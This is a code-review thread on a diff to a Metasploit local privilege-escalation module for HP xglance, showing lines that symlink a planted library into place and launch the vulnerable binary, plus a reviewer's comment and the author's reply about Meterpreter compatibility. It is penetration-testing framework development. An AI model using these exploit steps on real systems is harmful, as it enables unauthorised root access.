modules/exploits/linux/local/hp_xglance_priv_esc.rb

```diff
@@ -169,13 +155,15 @@ def exploit
     # just to be safe, Xt and Xp were in the original exploit
     # our mock binary is also exploitsable through libXmu.so.6
     # unsure about the real binary
+    cd exploit_folder
     ['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l|
-      cmd_exec "cd #{exploit_folder}; ln -s libXm.so.3 #{l}"
+      cmd_exec "ln -s libXm.so.3 #{l}"
     end
 
     # Launch exploit
-    print_status "Launching xglance-bin..."
-    output = cmd_exec "cd #{base_dir}; /opt/perf/bin/xglance-bin"
+    print_status 'Launching xglance-bin...'
+    cd base_dir
+    output = cmd_exec datastore['GLANCE_PATH']
```

Comment:
`cd base_dir` isn't going to work for Meterpreter sessions. If the working directory is important, this needs to be done in one command.

```suggestion
    output = cmd_exec "cd #{base_dir}; #{datastore['GLANCE_PATH']}"
```

Reply:
https://github.com/rapid7/metasploit-framework/blob/6712458dbd03af599759597c77111699ee8a0894/lib/msf/core/post/file.rb#L10 does handle meterpreter sessions.  vs `cmd_exec cd ...`.  I did test this and it is working.